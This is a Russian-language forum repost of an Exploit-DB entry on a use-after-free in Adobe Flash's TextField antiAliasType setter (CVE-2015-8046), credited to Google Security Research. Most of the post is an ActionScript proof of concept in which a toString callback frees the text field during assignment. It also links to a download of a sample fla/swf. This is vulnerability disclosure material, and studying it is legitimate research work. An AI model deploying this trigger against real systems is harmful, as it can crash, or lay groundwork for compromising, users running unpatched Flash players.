Exploit Adobe Flash TextField.antiAliasType Setter - Use-After-Free

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39019
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2015-8046
Дата публикации
2015-12-17
Adobe Flash TextField.antiAliasType Setter - Use-After-Free
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=560

There is a use-after-free in the TextField antiAliasType setter. If it is set to an object with a toString method that frees the TextField, the property will be written after it is freed.

A PoC is as follows:

var toptf = this.createEmptyMovieClip("toptf", 1);


function func(){
	
	toptf.removeMovieClip();	
	trace("here");
	return "advanced";
}

var o = {toString : func};


var my_format:TextFormat = new TextFormat();
my_format.font = "Times-12";

var my_text1:TextField = toptf.createTextField("my_text1", toptf.getNextHighestDepth(), 9.5, 10, 400, 100);
my_text1.text = "this.gridFitType = none";
my_text1.embedFonts = true;
my_text1.antiAliasType = o;
my_text1.gridFitType = "none";
my_text1.setTextFormat(my_format); 

var my_text2:TextField = toptf.createTextField("my_text2", toptf.getNextHighestDepth(), 9.5, 40, 400, 100);
my_text2.text = "this.gridFitType = advanced";
my_text2.embedFonts = true;
my_text2.antiAliasType = "advanced";
my_text2.gridFitType = "pixel";
my_text2.setTextFormat(my_format); 

var my_text3:TextField = toptf.createTextField("my_text3", toptf.getNextHighestDepth(), 9.5, 70, 400, 100);
my_text3.text = "this.gridFitType = subpixel";
my_text3.embedFonts = true;
my_text3.antiAliasType = "advanced";
my_text3.gridFitType = "subpixel";
my_text3.setTextFormat(my_format);

A sample fla and swf are attached.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39019.zip
 
Источник
www.exploit-db.com

Похожие темы